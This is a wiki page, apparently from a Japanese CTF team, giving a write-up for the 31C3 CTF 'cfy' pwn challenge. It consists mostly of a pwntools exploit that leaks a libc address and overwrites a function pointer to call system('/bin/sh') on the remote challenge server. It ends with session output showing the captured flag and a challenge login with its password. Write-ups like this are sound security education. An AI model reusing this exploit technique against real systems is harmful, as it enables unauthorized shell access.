ログイン
編集不可のページディスカッション情報添付ファイル
CTF/Writeup/31C3 CTF/cfy

MMA

cfy

   1 from pwn import *
   2 context(arch = "amd64", os = "linux")
   3 SYSTEM_REL = 0x44b30
   4 BUF = 0x6010e0
   5 PARSERS = 0x601080
   6 
   7 #conn = process("./cfy")
   8 conn = remote("188.40.18.73", 3313)
   9 conn.recvuntil("quit\n")
  10 
  11 def peek_addr(addr):
  12     conn.send("2\n")
  13     conn.recvuntil("number: ")
  14     conn.send(p64(addr) + "\n")
  15     conn.recvuntil("hex: 0x")
  16     result = int(conn.recvline()[:-1], 16)
  17     conn.recvuntil("quit\n")
  18     return result
  19 
  20 libc_base = peek_addr(0x601018) - 0x70940
  21 system_addr = libc_base + SYSTEM_REL
  22 
  23 s = "/bin/sh"
  24 s += "\0" * (0x10 - len(s))
  25 s += p64(system_addr)
  26 
  27 conn.send(str((BUF + 0x10 - PARSERS)/16) + "\n")
  28 conn.recvuntil("number: ")
  29 conn.send(s + "\n")
  30 
  31 conn.interactive()

% python exploit.py
[+] Opening connection to 188.40.18.73 on port 3313: OK
[*] Switching to interactive mode
$ cat /home/cfy/flag
THANK YOU WARIO!

BUT OUR PRINCESS IS IN
ANOTHER CASTLE!

Login: cfy_pwn // 31C3_G0nna_keep<on>grynding

CTF/Writeup/31C3 CTF/cfy (最終更新日時 2014-12-30 05:47:47 更新者 ytoku)